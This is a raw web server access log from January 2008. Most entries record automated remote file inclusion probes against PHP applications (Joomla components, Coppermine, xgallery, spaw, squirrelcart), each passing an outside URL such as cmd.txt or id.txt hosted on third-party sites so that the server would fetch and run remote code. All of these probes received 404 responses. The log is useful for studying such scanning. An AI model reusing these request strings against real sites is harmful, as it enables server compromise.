200.17.114.133 - - [25/Jan/2008:13:47:17 -0800] "GET /logs/classes/adodbt/sql.php?classes_dir=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.197.201.37 - - [25/Jan/2008:13:47:41 -0800] "GET /oneadmin/newspublish//include.php?path[docroot]=http://lovefromsenpai.com/anime/images/dvd/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.17.114.133 - - [25/Jan/2008:13:50:09 -0800] "GET /logs/access_080101.log/classes/adodbt/sql.php?classes_dir=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.23.27.5 - - [25/Jan/2008:13:55:44 -0800] "GET /logs/access_071218.log/classes/adodbt/sql.php?classes_dir=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
189.23.27.5 - - [25/Jan/2008:13:55:46 -0800] "GET /classes/adodbt/sql.php?classes_dir=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
189.23.27.5 - - [25/Jan/2008:13:55:48 -0800] "GET /logs/classes/adodbt/sql.php?classes_dir=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
189.23.27.5 - - [25/Jan/2008:13:55:53 -0800] "GET /logs/access_071218.log/classes/adodbt/sql.php?classes_dir=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
189.23.27.5 - - [25/Jan/2008:13:55:58 -0800] "GET /classes/adodbt/sql.php?classes_dir=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
189.23.27.5 - - [25/Jan/2008:13:55:59 -0800] "GET /logs/classes/adodbt/sql.php?classes_dir=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.32.57.162 - - [25/Jan/2008:13:56:16 -0800] "GET /modules/coppermine/include/init.inc.php?CPG_M_DIR=http://mymindmyvoice.com/crit?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
72.32.57.162 - - [25/Jan/2008:13:56:16 -0800] "GET /logs/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://mymindmyvoice.com/crit?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
8.6.223.16 - - [25/Jan/2008:13:56:51 -0800] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.23.232 - - [25/Jan/2008:13:58:04 -0800] "GET /bikes/ HTTP/1.0" 200 2168 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
89.171.105.130 - - [25/Jan/2008:13:58:09 -0800] "GET /oneadmin/newspublish//include.php?path[docroot]=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.171.105.130 - - [25/Jan/2008:13:58:11 -0800] "GET /oneadmin/calendar/samplecalendar.php?path[docroot]=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.23.27.5 - - [25/Jan/2008:13:58:19 -0800] "GET /logs/access_080101.log/classes/adodbt/sql.php?classes_dir=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.244.146.6 - - [25/Jan/2008:13:58:28 -0800] "GET /logs/access_071230.log/modules/cjaycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.244.146.6 - - [25/Jan/2008:13:58:29 -0800] "GET /modules/cjaycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.244.146.6 - - [25/Jan/2008:13:58:29 -0800] "GET /logs/modules/cjaycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
189.23.27.5 - - [25/Jan/2008:13:58:39 -0800] "GET /logs/access_080101.log/classes/adodbt/sql.php?classes_dir=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.106.179.153 - - [25/Jan/2008:13:58:55 -0800] "GET /logs/access_071230.log//vwar/convert/mvcw.php?step=1&vwar_root=http://www.p-l.nl/cache/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.199.216.176 - - [25/Jan/2008:13:59:29 -0800] "GET /presto/ HTTP/1.1" 200 526 "http://home.earthlink.net/~infernofilecabinet2/XpSetupsF_J/JourneyPII_Setup.htm" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)" "www.dmulk.com"
98.199.216.176 - - [25/Jan/2008:13:59:29 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)" "www.dmulk.com"
70.87.178.114 - - [25/Jan/2008:14:02:19 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.178.114 - - [25/Jan/2008:14:02:19 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.178.114 - - [25/Jan/2008:14:02:19 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.28.19 - - [25/Jan/2008:14:07:17 -0800] "GET /minamijewelry/html/ HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.8.120 - - [25/Jan/2008:14:09:10 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.8.120 - - [25/Jan/2008:14:09:13 -0800] "GET /tmp/?M=A HTTP/1.0" 200 812 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.117.128.45 - - [25/Jan/2008:14:10:12 -0800] "GET /logs/access_071230.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.merlions.se/pages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.117.128.45 - - [25/Jan/2008:14:10:12 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.merlions.se/pages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.117.128.45 - - [25/Jan/2008:14:10:12 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.merlions.se/pages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.117.128.45 - - [25/Jan/2008:14:10:12 -0800] "GET /logs/access_071230.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.merlions.se/pages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.117.128.45 - - [25/Jan/2008:14:10:13 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.merlions.se/pages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.117.128.45 - - [25/Jan/2008:14:10:13 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.merlions.se/pages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.87.178.114 - - [25/Jan/2008:14:10:31 -0800] "GET /logs/access.log//mygallery/myfunctions/mygallerybrowser.php?myPath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.178.114 - - [25/Jan/2008:14:10:32 -0800] "GET //mygallery/myfunctions/mygallerybrowser.php?myPath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.178.114 - - [25/Jan/2008:14:10:32 -0800] "GET /logs//mygallery/myfunctions/mygallerybrowser.php?myPath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.178.114 - - [25/Jan/2008:14:16:52 -0800] "GET /logs/access_071231.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.178.114 - - [25/Jan/2008:14:16:52 -0800] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.178.114 - - [25/Jan/2008:14:16:52 -0800] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
98.199.102.93 - - [25/Jan/2008:14:18:39 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://alboradaquartet.org/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.199.102.93 - - [25/Jan/2008:14:18:39 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://alboradaquartet.org/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.199.102.93 - - [25/Jan/2008:14:18:40 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://alboradaquartet.org/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.7.125 - - [25/Jan/2008:14:19:41 -0800] "GET /bikes/dteel/10MAR07/?N=D HTTP/1.0" 200 833 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.26.118 - - [25/Jan/2008:14:23:56 -0800] "GET /funny/ HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
189.23.27.5 - - [25/Jan/2008:14:24:18 -0800] "GET /logs/access_071230.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.20.143 - - [25/Jan/2008:14:26:21 -0800] "GET /funny/?S=A HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
189.23.27.5 - - [25/Jan/2008:14:27:23 -0800] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
189.23.27.5 - - [25/Jan/2008:14:27:25 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
189.23.27.5 - - [25/Jan/2008:14:27:26 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
8.6.223.16 - - [25/Jan/2008:14:27:46 -0800] "GET /logs/access_080101.log/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
8.6.223.16 - - [25/Jan/2008:14:27:46 -0800] "GET /logs/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.171.105.130 - - [25/Jan/2008:14:30:00 -0800] "GET /logs/access.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://alcohol114.com/dboard/files/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.25.236 - - [25/Jan/2008:14:31:01 -0800] "GET /plans/?N=D HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
8.6.223.16 - - [25/Jan/2008:14:32:38 -0800] "GET /logs/access_080106.log/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.77.94.81 - - [25/Jan/2008:14:32:49 -0800] "GET /logs/access_071229.log/errors.php?error=http://lorder.sitesled.com/idasc???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.77.94.81 - - [25/Jan/2008:14:32:49 -0800] "GET /errors.php?error=http://lorder.sitesled.com/idasc???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.77.94.81 - - [25/Jan/2008:14:32:50 -0800] "GET /logs/errors.php?error=http://lorder.sitesled.com/idasc???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.26.13 - - [25/Jan/2008:14:36:05 -0800] "GET /bikes/?N=D HTTP/1.0" 200 2168 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
89.171.105.130 - - [25/Jan/2008:14:38:42 -0800] "GET /logs/access.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://alcohol114.com/dboard/files/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.28.233 - - [25/Jan/2008:14:38:57 -0800] "GET /presto/?N=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
62.77.94.81 - - [25/Jan/2008:14:39:03 -0800] "GET /logs/access_071230.log/errors.php?error=http://lorder.sitesled.com/idasc???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.163.197.176 - - [25/Jan/2008:14:39:21 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://indramayu.zzl.org/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
189.23.27.5 - - [25/Jan/2008:14:39:38 -0800] "GET /logs/access_080112.log/index.php?inc_dir=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
189.23.27.5 - - [25/Jan/2008:14:39:40 -0800] "GET /logs/access_080112.log/index.php?inc_dir=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
189.23.27.5 - - [25/Jan/2008:14:39:41 -0800] "GET /index.php?inc_dir=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
189.23.27.5 - - [25/Jan/2008:14:39:42 -0800] "GET /index.php?inc_dir=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
189.23.27.5 - - [25/Jan/2008:14:39:43 -0800] "GET /logs/index.php?inc_dir=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
189.23.27.5 - - [25/Jan/2008:14:39:46 -0800] "GET /logs/index.php?inc_dir=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.19.169 - - [25/Jan/2008:14:40:56 -0800] "GET /funny/?M=A HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
194.58.105.34 - - [25/Jan/2008:14:42:42 -0800] "GET /logs//errors.php?errorhttp://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.58.105.34 - - [25/Jan/2008:14:42:43 -0800] "GET //errors.php?errorhttp://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.30.214.232 - - [25/Jan/2008:14:42:51 -0800] "GET /logs/access_071230.log HTTP/1.0" 200 231687 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
194.58.105.34 - - [25/Jan/2008:14:48:53 -0800] "GET /logs//errors.php?error=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.58.105.34 - - [25/Jan/2008:14:48:53 -0800] "GET //errors.php?error=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.6.28.152 - - [25/Jan/2008:14:50:05 -0800] "GET /megumi/?N=D HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
205.234.228.74 - - [25/Jan/2008:14:53:22 -0800] "GET /logs/access_071229.log//errors.php?errorhttp://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.228.74 - - [25/Jan/2008:14:53:22 -0800] "GET //errors.php?errorhttp://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.228.74 - - [25/Jan/2008:14:53:23 -0800] "GET /logs//errors.php?errorhttp://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.228.74 - - [25/Jan/2008:14:59:50 -0800] "GET /logs/access_071225.log//errors.php?errorhttp://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.178.114 - - [25/Jan/2008:15:04:37 -0800] "GET /logs/access_071230.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
189.23.27.5 - - [25/Jan/2008:15:07:04 -0800] "GET /logs/access_071230.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.169.184.251 - - [25/Jan/2008:15:09:27 -0800] "GET /logs/access_071230.log//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.184.251 - - [25/Jan/2008:15:09:27 -0800] "GET //components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.184.251 - - [25/Jan/2008:15:09:28 -0800] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
218.163.197.176 - - [25/Jan/2008:15:09:48 -0800] "GET //templates/mangobery/footer.sample.php?Site_Path=http://indramayu.zzl.org/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.80.123.56 - - [25/Jan/2008:15:12:22 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://astroindo.org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.80.123.56 - - [25/Jan/2008:15:12:22 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://astroindo.org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.80.123.56 - - [25/Jan/2008:15:15:13 -0800] "GET /logs/access_071230.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://astroindo.org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.85.29.25 - - [25/Jan/2008:15:15:32 -0800] "GET /logs/access_080106.log/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://vsfuzi.com/fuzi/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.29.25 - - [25/Jan/2008:15:15:37 -0800] "GET /com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://vsfuzi.com/fuzi/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.29.25 - - [25/Jan/2008:15:15:38 -0800] "GET /logs/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://vsfuzi.com/fuzi/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.194.74.238 - - [25/Jan/2008:15:21:59 -0800] "GET //index.php?option=com_masscontent&task=doc_view&gid=&mosConfig_absolute_path=http://nybap.org/images/rose.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
82.194.74.238 - - [25/Jan/2008:15:21:59 -0800] "GET /logs//index.php?option=com_masscontent&task=doc_view&gid=&mosConfig_absolute_path=http://nybap.org/images/rose.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
18.55.2.206 - - [25/Jan/2008:15:22:24 -0800] "GET //index.php?option=com_masscontent&task=doc_view&gid=&mosConfig_absolute_path=http://nybap.org/images/rose.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
18.55.2.206 - - [25/Jan/2008:15:22:24 -0800] "GET /logs//index.php?option=com_masscontent&task=doc_view&gid=&mosConfig_absolute_path=http://nybap.org/images/rose.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
206.123.86.2 - - [25/Jan/2008:15:22:37 -0800] "GET //index.php?option=com_masscontent&task=doc_view&gid=&mosConfig_absolute_path=http://nybap.org/images/rose.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
206.123.86.2 - - [25/Jan/2008:15:22:37 -0800] "GET /logs//index.php?option=com_masscontent&task=doc_view&gid=&mosConfig_absolute_path=http://nybap.org/images/rose.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
74.50.13.149 - - [25/Jan/2008:15:23:20 -0800] "GET /logs//index.php?option=com_masscontent&task=doc_view&gid=&mosConfig_absolute_path=http://nybap.org/images/rose.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
74.50.13.149 - - [25/Jan/2008:15:23:21 -0800] "GET //index.php?option=com_masscontent&task=doc_view&gid=&mosConfig_absolute_path=http://nybap.org/images/rose.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
134.129.197.99 - - [25/Jan/2008:15:23:58 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://brmania.t35.com/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.58.11.14 - - [25/Jan/2008:15:24:33 -0800] "GET /articles.php?do=http://www.tgd.com.tr/_upload/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
212.58.11.14 - - [25/Jan/2008:15:24:33 -0800] "GET /logs/articles.php?do=http://www.tgd.com.tr/_upload/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
84.19.176.87 - - [25/Jan/2008:15:26:02 -0800] "GET /logs/access_071230.log//squirrelcart/cart_content.php?cart_isp_root=http://www.laila.jp/item_pics/d3rf/teste.txt???????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.176.87 - - [25/Jan/2008:15:26:02 -0800] "GET //squirrelcart/cart_content.php?cart_isp_root=http://www.laila.jp/item_pics/d3rf/teste.txt???????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.176.87 - - [25/Jan/2008:15:26:03 -0800] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://www.laila.jp/item_pics/d3rf/teste.txt???????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.85.29.25 - - [25/Jan/2008:15:26:36 -0800] "GET /logs/access_071229.log/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://vsfuzi.com/fuzi/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.29.25 - - [25/Jan/2008:15:28:15 -0800] "GET /spaw/spaw_control.class.php?spaw_root=http://vsfuzi.com/fuzi/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.28.223 - - [25/Jan/2008:15:28:22 -0800] "GET /bikes/CreSTOC07/?M=A HTTP/1.0" 200 15280 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.25.135 - - [25/Jan/2008:15:32:12 -0800] "GET /presto/?D=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
199.237.204.148 - - [25/Jan/2008:15:35:52 -0800] "GET /logs/access_071216.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://lovefromsenpai.com/anime/images/dvd/on.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
199.237.204.148 - - [25/Jan/2008:15:35:52 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://lovefromsenpai.com/anime/images/dvd/on.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
199.237.204.148 - - [25/Jan/2008:15:35:53 -0800] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://lovefromsenpai.com/anime/images/dvd/on.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
150.161.5.91 - - [25/Jan/2008:15:37:01 -0800] "GET //livedraft.php?PHPFFL_FILE_ROOT=http://www.freelance-media.ca//dotproject/classes/.r/xxx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.171.105.130 - - [25/Jan/2008:15:37:04 -0800] "GET /logs/access_071216.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
